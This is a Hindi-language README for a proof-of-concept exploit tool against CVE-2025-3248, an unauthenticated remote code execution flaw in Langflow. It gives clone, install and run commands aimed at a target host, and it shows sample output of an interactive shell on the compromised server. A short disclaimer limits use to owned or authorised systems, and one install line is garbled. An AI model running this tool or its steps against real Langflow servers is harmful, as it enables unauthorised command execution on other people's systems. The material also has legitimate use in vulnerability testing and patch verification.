
Langflow AI Remote Code Execution (Unauthenticated) के लिए एक्सप्लॉइट
यह एक्सप्लॉइट Langflow AI में एक गंभीर अप्रमाणित RCE भेद्यता (CVE-2025-3248) को लक्षित करता है। यह भेद्यता हमलावर को /api/v1/validate/code एंडपॉइंट के माध्यम से लक्ष्य सर्वर पर मनमानी सिस्टम कमांड निष्पादित करने की अनुमति देती है।
यह प्रूफ-ऑफ-कॉन्सेप्ट (PoC) टूल समस्या के परीक्षण और प्रदर्शन के लिए एक इंटरेक्टिव शेल प्रदान करता है।
pip3git clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248
pip3 install -r requirements.txt
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT
python3 CVE-2025-3248.py -u http://127.0.0.1:7860
आपको एक इंटरेक्टिव शेल प्रस्तुत किया जाएगा:
0xgh057r3c0n@root💀$ whoami
langflow
0xgh057r3c0n@root💀$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
exit या quit टाइप करेंयह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है — विवरण के लिए LICENSE फ़ाइल देखें।
यह सॉफ़्टवेयर केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है। लेखक इस कोड के किसी भी दुरुपयोग के लिए कोई दायित्व नहीं लेता है। केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है।